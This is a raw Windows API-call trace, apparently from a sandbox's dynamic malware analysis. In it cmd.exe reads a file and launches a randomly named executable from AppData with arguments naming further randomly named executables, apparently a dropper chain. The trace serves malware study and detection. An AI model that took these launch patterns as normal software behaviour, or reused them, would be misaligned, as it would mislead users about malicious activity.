[0098.744] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30dd44 | out: lpNewFilePointer=0x0) returned 1 [0098.744] _get_osfhandle (_FileHandle=4) returned 0x54 [0098.745] ReadFile (in: hFile=0x54, lpBuffer=0x30eb74, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30dd64, lpOverlapped=0x0 | out: lpBuffer=0x30eb74*, lpNumberOfBytesRead=0x30dd64*=0x200, lpOverlapped=0x0) returned 1 [0098.745] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30dd44 | out: lpNewFilePointer=0x0) returned 1 [0098.745] _get_osfhandle (_FileHandle=4) returned 0x54 [0098.745] ReadFile (in: hFile=0x54, lpBuffer=0x30eb74, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30dd64, lpOverlapped=0x0 | out: lpBuffer=0x30eb74*, lpNumberOfBytesRead=0x30dd64*=0x200, lpOverlapped=0x0) returned 1 [0098.745] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30dd44 | out: lpNewFilePointer=0x0) returned 1 [0098.745] _get_osfhandle (_FileHandle=4) returned 0x54 [0098.745] ReadFile (in: hFile=0x54, lpBuffer=0x30eb74, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30dd64, lpOverlapped=0x0 | out: lpBuffer=0x30eb74*, lpNumberOfBytesRead=0x30dd64*=0x200, lpOverlapped=0x0) returned 1 [0098.745] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30dd44 | out: lpNewFilePointer=0x0) returned 1 [0098.745] _get_osfhandle (_FileHandle=4) returned 0x54 [0098.745] ReadFile (in: hFile=0x54, lpBuffer=0x30eb74, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30dd64, lpOverlapped=0x0 | out: lpBuffer=0x30eb74*, lpNumberOfBytesRead=0x30dd64*=0x200, lpOverlapped=0x0) returned 1 [0098.745] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30dd44 | out: lpNewFilePointer=0x0) returned 1 [0098.745] _get_osfhandle (_FileHandle=4) returned 0x54 [0098.745] ReadFile (in: hFile=0x54, lpBuffer=0x30eb74, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30dd64, lpOverlapped=0x0 | out: lpBuffer=0x30eb74*, lpNumberOfBytesRead=0x30dd64*=0x200, lpOverlapped=0x0) returned 1 [0098.745] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30dd44 | out: lpNewFilePointer=0x0) returned 1 [0098.745] _get_osfhandle (_FileHandle=4) returned 0x54 [0098.745] ReadFile (in: hFile=0x54, lpBuffer=0x30eb74, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30dd64, lpOverlapped=0x0 | out: lpBuffer=0x30eb74*, lpNumberOfBytesRead=0x30dd64*=0x200, lpOverlapped=0x0) returned 1 [0098.745] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30dd44 | out: lpNewFilePointer=0x0) returned 1 [0098.745] _get_osfhandle (_FileHandle=4) returned 0x54 [0098.745] ReadFile (in: hFile=0x54, lpBuffer=0x30eb74, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30dd64, lpOverlapped=0x0 | out: lpBuffer=0x30eb74*, lpNumberOfBytesRead=0x30dd64*=0x200, lpOverlapped=0x0) returned 1 [0098.745] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30dd44 | out: lpNewFilePointer=0x0) returned 1 [0098.746] _get_osfhandle (_FileHandle=4) returned 0x54 [0098.746] ReadFile (in: hFile=0x54, lpBuffer=0x30eb74, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30dd64, lpOverlapped=0x0 | out: lpBuffer=0x30eb74*, lpNumberOfBytesRead=0x30dd64*=0x200, lpOverlapped=0x0) returned 1 [0098.746] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30dd44 | out: lpNewFilePointer=0x0) returned 1 [0098.746] _get_osfhandle (_FileHandle=4) returned 0x54 [0098.746] ReadFile (in: hFile=0x54, lpBuffer=0x30eb74, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30dd64, lpOverlapped=0x0 | out: lpBuffer=0x30eb74*, lpNumberOfBytesRead=0x30dd64*=0x200, lpOverlapped=0x0) returned 1 [0098.746] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30dd44 | out: lpNewFilePointer=0x0) returned 1 [0098.746] _get_osfhandle (_FileHandle=4) returned 0x54 [0098.746] ReadFile (in: hFile=0x54, lpBuffer=0x30eb74, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30dd64, lpOverlapped=0x0 | out: lpBuffer=0x30eb74*, lpNumberOfBytesRead=0x30dd64*=0x200, lpOverlapped=0x0) returned 1 [0098.746] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30dd44 | out: lpNewFilePointer=0x0) returned 1 [0098.746] _get_osfhandle (_FileHandle=4) returned 0x54 [0098.746] ReadFile (in: hFile=0x54, lpBuffer=0x30eb74, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30dd64, lpOverlapped=0x0 | out: lpBuffer=0x30eb74*, lpNumberOfBytesRead=0x30dd64*=0x200, lpOverlapped=0x0) returned 1 [0098.746] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30dd44 | out: lpNewFilePointer=0x0) returned 1 [0098.746] _get_osfhandle (_FileHandle=4) returned 0x54 [0098.746] ReadFile (in: hFile=0x54, lpBuffer=0x30eb74, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30dd64, lpOverlapped=0x0 | out: lpBuffer=0x30eb74*, lpNumberOfBytesRead=0x30dd64*=0x200, lpOverlapped=0x0) returned 1 [0098.746] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30dd44 | out: lpNewFilePointer=0x0) returned 1 [0098.746] _get_osfhandle (_FileHandle=4) returned 0x54 [0098.746] ReadFile (in: hFile=0x54, lpBuffer=0x30eb74, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30dd64, lpOverlapped=0x0 | out: lpBuffer=0x30eb74*, lpNumberOfBytesRead=0x30dd64*=0x200, lpOverlapped=0x0) returned 1 [0098.746] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30dd44 | out: lpNewFilePointer=0x0) returned 1 [0098.746] _get_osfhandle (_FileHandle=4) returned 0x54 [0098.746] ReadFile (in: hFile=0x54, lpBuffer=0x30eb74, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30dd64, lpOverlapped=0x0 | out: lpBuffer=0x30eb74*, lpNumberOfBytesRead=0x30dd64*=0x200, lpOverlapped=0x0) returned 1 [0098.746] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30dd44 | out: lpNewFilePointer=0x0) returned 1 [0098.747] _get_osfhandle (_FileHandle=4) returned 0x54 [0098.747] ReadFile (in: hFile=0x54, lpBuffer=0x30eb74, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30dd64, lpOverlapped=0x0 | out: lpBuffer=0x30eb74*, lpNumberOfBytesRead=0x30dd64*=0x200, lpOverlapped=0x0) returned 1 [0098.747] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30dd44 | out: lpNewFilePointer=0x0) returned 1 [0098.747] _get_osfhandle (_FileHandle=4) returned 0x54 [0098.747] ReadFile (in: hFile=0x54, lpBuffer=0x30eb74, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30dd64, lpOverlapped=0x0 | out: lpBuffer=0x30eb74*, lpNumberOfBytesRead=0x30dd64*=0x200, lpOverlapped=0x0) returned 1 [0098.747] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30dd44 | out: lpNewFilePointer=0x0) returned 1 [0098.747] _get_osfhandle (_FileHandle=4) returned 0x54 [0098.747] ReadFile (in: hFile=0x54, lpBuffer=0x30eb74, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30dd64, lpOverlapped=0x0 | out: lpBuffer=0x30eb74*, lpNumberOfBytesRead=0x30dd64*=0x200, lpOverlapped=0x0) returned 1 [0098.747] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30dd44 | out: lpNewFilePointer=0x0) returned 1 [0098.747] _get_osfhandle (_FileHandle=4) returned 0x54 [0098.747] ReadFile (in: hFile=0x54, lpBuffer=0x30eb74, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30dd64, lpOverlapped=0x0 | out: lpBuffer=0x30eb74*, lpNumberOfBytesRead=0x30dd64*=0x200, lpOverlapped=0x0) returned 1 [0098.747] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30dd44 | out: lpNewFilePointer=0x0) returned 1 [0098.747] _get_osfhandle (_FileHandle=4) returned 0x54 [0098.747] ReadFile (in: hFile=0x54, lpBuffer=0x30eb74, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30dd64, lpOverlapped=0x0 | out: lpBuffer=0x30eb74*, lpNumberOfBytesRead=0x30dd64*=0x200, lpOverlapped=0x0) returned 1 [0098.747] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30dd44 | out: lpNewFilePointer=0x0) returned 1 [0098.747] _get_osfhandle (_FileHandle=4) returned 0x54 [0098.747] ReadFile (in: hFile=0x54, lpBuffer=0x30eb74, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30dd64, lpOverlapped=0x0 | out: lpBuffer=0x30eb74*, lpNumberOfBytesRead=0x30dd64*=0x200, lpOverlapped=0x0) returned 1 [0098.747] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30dd44 | out: lpNewFilePointer=0x0) returned 1 [0098.747] _get_osfhandle (_FileHandle=4) returned 0x54 [0098.747] ReadFile (in: hFile=0x54, lpBuffer=0x30eb74, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30dd64, lpOverlapped=0x0 | out: lpBuffer=0x30eb74*, lpNumberOfBytesRead=0x30dd64*=0x200, lpOverlapped=0x0) returned 1 [0098.747] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30dd44 | out: lpNewFilePointer=0x0) returned 1 [0098.747] _get_osfhandle (_FileHandle=4) returned 0x54 [0098.747] ReadFile (in: hFile=0x54, lpBuffer=0x30eb74, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30dd64, lpOverlapped=0x0 | out: lpBuffer=0x30eb74*, lpNumberOfBytesRead=0x30dd64*=0x200, lpOverlapped=0x0) returned 1 [0098.748] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30dd44 | out: lpNewFilePointer=0x0) returned 1 [0098.748] _get_osfhandle (_FileHandle=4) returned 0x54 [0098.748] ReadFile (in: hFile=0x54, lpBuffer=0x30eb74, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30dd64, lpOverlapped=0x0 | out: lpBuffer=0x30eb74*, lpNumberOfBytesRead=0x30dd64*=0x200, lpOverlapped=0x0) returned 1 [0098.748] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30dd44 | out: lpNewFilePointer=0x0) returned 1 [0098.748] _get_osfhandle (_FileHandle=4) returned 0x54 [0098.748] ReadFile (in: hFile=0x54, lpBuffer=0x30eb74, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30dd64, lpOverlapped=0x0 | out: lpBuffer=0x30eb74*, lpNumberOfBytesRead=0x30dd64*=0x200, lpOverlapped=0x0) returned 1 [0098.748] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30dd44 | out: lpNewFilePointer=0x0) returned 1 [0098.748] _get_osfhandle (_FileHandle=4) returned 0x54 [0098.748] ReadFile (in: hFile=0x54, lpBuffer=0x30eb74, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30dd64, lpOverlapped=0x0 | out: lpBuffer=0x30eb74*, lpNumberOfBytesRead=0x30dd64*=0x200, lpOverlapped=0x0) returned 1 [0098.748] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30dd44 | out: lpNewFilePointer=0x0) returned 1 [0098.748] _get_osfhandle (_FileHandle=4) returned 0x54 [0098.748] ReadFile (in: hFile=0x54, lpBuffer=0x30eb74, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30dd64, lpOverlapped=0x0 | out: lpBuffer=0x30eb74*, lpNumberOfBytesRead=0x30dd64*=0x200, lpOverlapped=0x0) returned 1 [0098.813] _close (_FileHandle=4) returned 0 [0098.813] FindNextFileW (in: hFindFile=0x4d20b8, lpFindFileData=0x30edd8 | out: lpFindFileData=0x30edd8) returned 0 [0098.814] GetLastError () returned 0x12 [0098.814] FindClose (in: hFindFile=0x4d20b8 | out: hFindFile=0x4d20b8) returned 1 [0098.814] _dup2 (_FileHandleSrc=3, _FileHandleDst=1) returned 0 [0098.816] _close (_FileHandle=3) returned 0 [0098.817] GetConsoleTitleW (in: lpConsoleTitle=0x30f274, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0098.817] GetFileAttributesW (lpFileName="\"C:\\Users\\EEBsYm5\\AppData\\Local\\MICROS~1\\Sypykbck.exe\"" (normalized: "c:\\users\\eebsym5\\desktop\\\"c:\\users\\eebsym5\\appdata\\local\\micros~1\\sypykbck.exe\"")) returned 0xffffffff [0098.817] _wcsicmp (_String1="\"C", _String2="DIR") returned -66 [0098.817] _wcsicmp (_String1="\"C", _String2="ERASE") returned -67 [0098.817] _wcsicmp (_String1="\"C", _String2="DEL") returned -66 [0098.817] _wcsicmp (_String1="\"C", _String2="TYPE") returned -82 [0098.817] _wcsicmp (_String1="\"C", _String2="COPY") returned -65 [0098.817] _wcsicmp (_String1="\"C", _String2="CD") returned -65 [0098.817] _wcsicmp (_String1="\"C", _String2="CHDIR") returned -65 [0098.817] _wcsicmp (_String1="\"C", _String2="RENAME") returned -80 [0098.817] _wcsicmp (_String1="\"C", _String2="REN") returned -80 [0098.817] _wcsicmp (_String1="\"C", _String2="ECHO") returned -67 [0098.817] _wcsicmp (_String1="\"C", _String2="SET") returned -81 [0098.817] _wcsicmp (_String1="\"C", _String2="PAUSE") returned -78 [0098.817] _wcsicmp (_String1="\"C", _String2="DATE") returned -66 [0098.817] _wcsicmp (_String1="\"C", _String2="TIME") returned -82 [0098.817] _wcsicmp (_String1="\"C", _String2="PROMPT") returned -78 [0098.817] _wcsicmp (_String1="\"C", _String2="MD") returned -75 [0098.817] _wcsicmp (_String1="\"C", _String2="MKDIR") returned -75 [0098.817] _wcsicmp (_String1="\"C", _String2="RD") returned -80 [0098.817] _wcsicmp (_String1="\"C", _String2="RMDIR") returned -80 [0098.817] _wcsicmp (_String1="\"C", _String2="PATH") returned -78 [0098.817] _wcsicmp (_String1="\"C", _String2="GOTO") returned -69 [0098.817] _wcsicmp (_String1="\"C", _String2="SHIFT") returned -81 [0098.817] _wcsicmp (_String1="\"C", _String2="CLS") returned -65 [0098.817] _wcsicmp (_String1="\"C", _String2="CALL") returned -65 [0098.817] _wcsicmp (_String1="\"C", _String2="VERIFY") returned -84 [0098.817] _wcsicmp (_String1="\"C", _String2="VER") returned -84 [0098.817] _wcsicmp (_String1="\"C", _String2="VOL") returned -84 [0098.817] _wcsicmp (_String1="\"C", _String2="EXIT") returned -67 [0098.817] _wcsicmp (_String1="\"C", _String2="SETLOCAL") returned -81 [0098.817] _wcsicmp (_String1="\"C", _String2="ENDLOCAL") returned -67 [0098.817] _wcsicmp (_String1="\"C", _String2="TITLE") returned -82 [0098.817] _wcsicmp (_String1="\"C", _String2="START") returned -81 [0098.818] _wcsicmp (_String1="\"C", _String2="DPATH") returned -66 [0098.818] _wcsicmp (_String1="\"C", _String2="KEYS") returned -73 [0098.818] _wcsicmp (_String1="\"C", _String2="MOVE") returned -75 [0098.818] _wcsicmp (_String1="\"C", _String2="PUSHD") returned -78 [0098.818] _wcsicmp (_String1="\"C", _String2="POPD") returned -78 [0098.818] _wcsicmp (_String1="\"C", _String2="ASSOC") returned -63 [0098.818] _wcsicmp (_String1="\"C", _String2="FTYPE") returned -68 [0098.818] _wcsicmp (_String1="\"C", _String2="BREAK") returned -64 [0098.818] _wcsicmp (_String1="\"C", _String2="COLOR") returned -65 [0098.818] _wcsicmp (_String1="\"C", _String2="MKLINK") returned -75 [0098.818] _wcsicmp (_String1="\"C", _String2="DIR") returned -66 [0098.818] _wcsicmp (_String1="\"C", _String2="ERASE") returned -67 [0098.818] _wcsicmp (_String1="\"C", _String2="DEL") returned -66 [0098.818] _wcsicmp (_String1="\"C", _String2="TYPE") returned -82 [0098.818] _wcsicmp (_String1="\"C", _String2="COPY") returned -65 [0098.818] _wcsicmp (_String1="\"C", _String2="CD") returned -65 [0098.818] _wcsicmp (_String1="\"C", _String2="CHDIR") returned -65 [0098.818] _wcsicmp (_String1="\"C", _String2="RENAME") returned -80 [0098.818] _wcsicmp (_String1="\"C", _String2="REN") returned -80 [0098.818] _wcsicmp (_String1="\"C", _String2="ECHO") returned -67 [0098.818] _wcsicmp (_String1="\"C", _String2="SET") returned -81 [0098.818] _wcsicmp (_String1="\"C", _String2="PAUSE") returned -78 [0098.818] _wcsicmp (_String1="\"C", _String2="DATE") returned -66 [0098.818] _wcsicmp (_String1="\"C", _String2="TIME") returned -82 [0098.818] _wcsicmp (_String1="\"C", _String2="PROMPT") returned -78 [0098.818] _wcsicmp (_String1="\"C", _String2="MD") returned -75 [0098.818] _wcsicmp (_String1="\"C", _String2="MKDIR") returned -75 [0098.818] _wcsicmp (_String1="\"C", _String2="RD") returned -80 [0098.818] _wcsicmp (_String1="\"C", _String2="RMDIR") returned -80 [0098.818] _wcsicmp (_String1="\"C", _String2="PATH") returned -78 [0098.818] _wcsicmp (_String1="\"C", _String2="GOTO") returned -69 [0098.818] _wcsicmp (_String1="\"C", _String2="SHIFT") returned -81 [0098.818] _wcsicmp (_String1="\"C", _String2="CLS") returned -65 [0098.818] _wcsicmp (_String1="\"C", _String2="CALL") returned -65 [0098.818] _wcsicmp (_String1="\"C", _String2="VERIFY") returned -84 [0098.818] _wcsicmp (_String1="\"C", _String2="VER") returned -84 [0098.818] _wcsicmp (_String1="\"C", _String2="VOL") returned -84 [0098.818] _wcsicmp (_String1="\"C", _String2="EXIT") returned -67 [0098.818] _wcsicmp (_String1="\"C", _String2="SETLOCAL") returned -81 [0098.818] _wcsicmp (_String1="\"C", _String2="ENDLOCAL") returned -67 [0098.818] _wcsicmp (_String1="\"C", _String2="TITLE") returned -82 [0098.818] _wcsicmp (_String1="\"C", _String2="START") returned -81 [0098.818] _wcsicmp (_String1="\"C", _String2="DPATH") returned -66 [0098.818] _wcsicmp (_String1="\"C", _String2="KEYS") returned -73 [0098.818] _wcsicmp (_String1="\"C", _String2="MOVE") returned -75 [0098.818] _wcsicmp (_String1="\"C", _String2="PUSHD") returned -78 [0098.818] _wcsicmp (_String1="\"C", _String2="POPD") returned -78 [0098.818] _wcsicmp (_String1="\"C", _String2="ASSOC") returned -63 [0098.819] _wcsicmp (_String1="\"C", _String2="FTYPE") returned -68 [0098.819] _wcsicmp (_String1="\"C", _String2="BREAK") returned -64 [0098.819] _wcsicmp (_String1="\"C", _String2="COLOR") returned -65 [0098.819] _wcsicmp (_String1="\"C", _String2="MKLINK") returned -75 [0098.819] _wcsicmp (_String1="\"C", _String2="FOR") returned -68 [0098.819] _wcsicmp (_String1="\"C", _String2="IF") returned -71 [0098.819] _wcsicmp (_String1="\"C", _String2="REM") returned -80 [0098.819] _wcsnicmp (_String1="C:\\U", _String2="cmd ", _MaxCount=0x4) returned -51 [0098.819] SetErrorMode (uMode=0x0) returned 0x0 [0098.819] SetErrorMode (uMode=0x1) returned 0x0 [0098.819] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\MICROS~1\\.", nBufferLength=0x208, lpBuffer=0x4d0618, lpFilePart=0x30ed94 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Local\\MICROS~1", lpFilePart=0x30ed94*="MICROS~1") returned 0x27 [0098.819] SetErrorMode (uMode=0x0) returned 0x1 [0098.819] NeedCurrentDirectoryForExePathW (ExeName="C:\\Users\\EEBsYm5\\AppData\\Local\\MICROS~1\\.") returned 1 [0098.819] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a120640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0098.822] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0098.822] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\MICROS~1\\Sypykbck.exe", fInfoLevelId=0x1, lpFindFileData=0x30eb30, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x30eb30) returned 0x4d20b8 [0098.822] FindClose (in: hFindFile=0x4d20b8 | out: hFindFile=0x4d20b8) returned 1 [0098.822] _wcsicmp (_String1=".exe", _String2=".CMD") returned 2 [0098.823] _wcsicmp (_String1=".exe", _String2=".BAT") returned 3 [0098.823] GetConsoleTitleW (in: lpConsoleTitle=0x30f008, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0098.823] InitializeProcThreadAttributeList (in: lpAttributeList=0x30ee90, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x30ef58 | out: lpAttributeList=0x30ee90, lpSize=0x30ef58) returned 1 [0098.823] UpdateProcThreadAttribute (in: lpAttributeList=0x30ee90, dwFlags=0x0, Attribute=0x60001, lpValue=0x30ef50, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x30ee90, lpPreviousValue=0x0) returned 1 [0098.823] GetStartupInfoW (in: lpStartupInfo=0x30ee4c | out: lpStartupInfo=0x30ee4c*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x1f4b, hStdOutput=0x0, hStdError=0x1000000)) [0098.823] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0098.823] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0098.823] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0098.823] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0098.823] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0098.823] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0098.823] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0098.823] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0098.823] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0098.823] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0098.823] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0098.823] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0098.823] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0098.823] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0098.823] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0098.823] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0098.823] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0098.823] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0098.823] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0098.823] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0098.823] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0098.823] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0098.823] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0098.823] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0098.823] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0098.823] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0098.823] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0098.823] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0098.823] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0098.823] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0098.823] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0098.823] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0098.824] lstrcmpW (lpString1="\\Sypykbck.exe", lpString2="\\XCOPY.EXE") returned -1 [0098.824] CreateProcessW (in: lpApplicationName="C:\\Users\\EEBsYm5\\AppData\\Local\\MICROS~1\\Sypykbck.exe", lpCommandLine="\"C:\\Users\\EEBsYm5\\AppData\\Local\\MICROS~1\\Sypykbck.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\XEY8d7zI.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\Microsoft\\LSfkRHur.exe\" 2", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\EEBsYm5\\Desktop", lpStartupInfo=0x30eeec*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="\"C:\\Users\\EEBsYm5\\AppData\\Local\\MICROS~1\\Sypykbck.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\XEY8d7zI.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\Microsoft\\LSfkRHur.exe\" 2", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x30ef38 | out: lpCommandLine="\"C:\\Users\\EEBsYm5\\AppData\\Local\\MICROS~1\\Sypykbck.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\XEY8d7zI.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\Microsoft\\LSfkRHur.exe\" 2", lpProcessInformation=0x30ef38*(hProcess=0x50, hThread=0x4c, dwProcessId=0xc0c, dwThreadId=0xc10)) returned 1 [0099.089] CloseHandle (hObject=0x4c) returned 1 [0099.089] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0099.089] GetEnvironmentStringsW () returned 0x4d2d68* [0099.089] FreeEnvironmentStringsW (penv=0x4d2d68) returned 1 [0099.089] WaitForSingleObject (hHandle=0x50, dwMilliseconds=0xffffffff) returned 0x0 [0100.942] GetExitCodeProcess (in: hProcess=0x50, lpExitCode=0x30ee2c | out: lpExitCode=0x30ee2c*=0x0) returned 1 [0100.942] CloseHandle (hObject=0x50) returned 1 [0100.942] _vsnwprintf (in: _Buffer=0x30ef74, _BufferCount=0x13, _Format="%08X", _ArgList=0x30ee38 | out: _Buffer="00000000") returned 8 [0100.942] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 